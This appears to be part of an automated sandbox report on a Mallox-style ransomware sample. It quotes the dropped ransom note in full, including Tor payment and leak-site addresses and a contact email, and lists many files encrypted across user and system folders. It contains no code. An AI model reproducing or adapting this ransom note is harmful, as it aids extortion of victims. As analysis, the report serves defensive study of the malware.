        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\Users\Public\Pictures\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00.UWPDesktop_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: d867aabcb6cf90e0977868505) you will see payment information and we can make free test decryption hereour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgwaiting for a response via mail caJump to dropped file
        Writes many files with high entropy
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\Settings.ft entropy: 7.9942666855Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.0.filtertrie.intermediate.txt entropy: 7.99662349249Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt entropy: 7.99743778305Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt entropy: 7.99559027567Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt entropy: 7.99684702187Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99229047926Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.9911308916Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt entropy: 7.99805173821Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99732880484Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133780452996319870.txt entropy: 7.99679453257Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133780452700603090.txt entropy: 7.99687220859Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945536046333.txt entropy: 7.99611075941Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99516216311Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99152568717Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99436930426Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99518484052Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 entropy: 7.99744588577Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db entropy: 7.99230996584Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99752482988Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99711857944Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99569816742Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99446144553Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.9907077642Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929a.log entropy: 7.99667564164Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258c.log entropy: 7.99817165002Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258.log entropy: 7.99623908834Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log entropy: 7.99237229386Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1157.log entropy: 7.99825906266Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051a.log entropy: 7.99834020666Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051.log entropy: 7.99033330195Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1000.log entropy: 7.99564745029Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.cache entropy: 7.99755266274Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\offline entropy: 7.99296635577Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\msedge_installer.log entropy: 7.99236445597Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log entropy: 7.99537480343Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log entropy: 7.99372188059Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log entropy: 7.99642457986Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1153.log entropy: 7.99824701937Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log entropy: 7.99446378708Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log entropy: 7.99704642396Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64 entropy: 7.99738559778Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.cache entropy: 7.99552341889Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache entropy: 7.99649590386Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js entropy: 7.99832932961Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\2[1] entropy: 7.99421885843Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\toptraffic[1] entropy: 7.99957322925Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js entropy: 7.99849679728Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2[1].css entropy: 7.99706142698Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\7zCon.sfx entropy: 7.99777932018Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\7-zip.chm entropy: 7.99839546856Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\7z.sfx entropy: 7.99663762013Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json entropy: 7.99725391521Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\oneDs_f2e0f4a029670f10d892[1].js entropy: 7.99648666148Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js entropy: 7.99588212188Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js entropy: 7.99510011488Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\2[1] entropy: 7.99782630692Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2[1].css entropy: 7.99147298346Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\History.txt entropy: 7.99717154496Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.097adb72-8dc9-4f20-a3ce-f53355ac0c6f.1.etl entropy: 7.997678084Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.03156670-ff72-4555-893a-7529a6b7b380.1.etl entropy: 7.99587609808Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99430868857Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99701595454Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99498041954Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.456c314c-694c-46de-be66-a081d0cb7df7.1.etl entropy: 7.99643670309Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.03b90911-d494-4396-b759-a499bbf9552e.1.etl entropy: 7.99671112697Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.58d76bcd-62a1-46af-b234-21d45b4c8ddb.1.etl entropy: 7.99626091158Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.4.etl entropy: 7.99765462411Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.5.etl entropy: 7.99765193917Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.3.etl entropy: 7.9975262566Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.2.etl entropy: 7.99751124058Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.1.etl entropy: 7.99747970834Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.097adb72-8dc9-4f20-a3ce-f53355ac0c6f.2.etl entropy: 7.99336257624Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.12f4b0a3-2493-41b5-84db-21e2bcb53ca6.1.etl entropy: 7.99586906895Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.3252bd92-212a-43b9-b716-30271b7db485.1.etl entropy: 7.99779611986Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.3.etl entropy: 7.99761898625Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5cf9101f-dc6a-47c8-a434-4cad9d63cff0.1.etl entropy: 7.99748824167Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5cf9101f-dc6a-47c8-a434-4cad9d63cff0.2.etl entropy: 7.99779939113Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.4.etl entropy: 7.99776233303Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.2.etl entropy: 7.9976343961Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.1.etl entropy: 7.99769091193Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.27bed3f1-68c9-49d1-a722-3ebce1687afe.1.etl entropy: 7.99608457082Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.6.etl entropy: 7.99457261902Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.1.etl entropy: 7.99804924651Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5cf9101f-dc6a-47c8-a434-4cad9d63cff0.3.etl entropy: 7.99059210732Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.599b8733-4301-4cc3-93ed-74bd979f66dd.5.etl entropy: 7.99447216047Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.1.etl entropy: 7.99795948824Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.69a57cbe-2a9e-4202-9484-4bfde9ed5d83.1.etl entropy: 7.99685176604Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.4.etl entropy: 7.99737710894Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.2.etl entropy: 7.99785453449Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.5.etl entropy: 7.99788197155Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.6.etl entropy: 7.99418907939Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6946adc3-5df1-4ad0-a3f3-2cd8906ea87d.3.etl entropy: 7.99744746745Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.4.etl entropy: 7.99778163708Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.5.etl entropy: 7.99700710655Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.2.etl entropy: 7.99724137725Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.6d9d4a0e-ffd8-47af-9ba4-1a437149f527.3.etl entropy: 7.99778656701Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.93db6b16-048f-491f-a82d-3646e2a89960.1.etl entropy: 7.99659488536Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8b9a8cce-1a0e-422e-9d0f-0e651c215019.1.etl entropy: 7.99625556445Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8485548a-2aef-4221-833c-c3035584658e.1.etl entropy: 7.9978080749Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.77f1869c-4161-4891-bcef-34ee379d1248.2.etl entropy: 7.99065064276Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.77f1869c-4161-4891-bcef-34ee379d1248.1.etl entropy: 7.99758536298Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.76c07319-aaea-47b0-8c40-094708538806.1.etl entropy: 7.99571330994Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bb81c698-fe7d-4d30-9989-461753efddde.1.etl entropy: 7.99100259786Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.86e0a252-c2a0-43a1-a9eb-7a55532be78d.1.etl entropy: 7.99626374095Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a0d81e20-2141-420e-9504-5087f6672953.1.etl entropy: 7.99630565985Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.99d47f55-28c7-42fb-b9ec-beaa25ab2fd1.1.etl entropy: 7.99607962306Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.4.etl entropy: 7.99793449017Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.3.etl entropy: 7.99743348121Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.40e9bdc1-a29d-4b1a-a7d1-bb2a3737a6de.1.etl entropy: 7.99050057052Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dd581e08-6d31-4ec0-90de-cdaed5f87060.1.etl entropy: 7.99624045289Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.2.etl entropy: 7.99784713562Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.1.etl entropy: 7.99782535664Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\WuProvider.cd10c994-6e5b-4302-9bb7-4110b2d7c98b.1.etl entropy: 7.99136110806Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\ProgramData\USOShared\Logs\System\WuProvider.8b76dbfc-b232-4f54-8aad-d9196c0d5c6c.1.etl entropy: 7.99009368985Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst entropy: 7.99741976905Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf entropy: 7.99695541837Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\Default\NTUSER.DAT.LOG2 entropy: 7.99058193781Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1 entropy: 7.99715566202Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\Lang\gu.txt entropy: 7.99175482435Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt entropy: 7.99154690875Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\Lang\si.txt entropy: 7.99069617611Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt entropy: 7.99115134039Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\Lang\mng.txt entropy: 7.99088951366Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\7-Zip\Lang\sa.txt entropy: 7.99042514077Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak entropy: 7.99964591696Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak entropy: 7.99977167932Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt entropy: 7.9929088449Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb entropy: 7.99686833831Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf entropy: 7.9990791007Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf entropy: 7.99362124225Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\resources.pak entropy: 7.99854284158Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf entropy: 7.99891997798Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif entropy: 7.9990932572Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak entropy: 7.99608624821Jump to dropped file
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt entropy: 7.99312224478Jump to dropped file
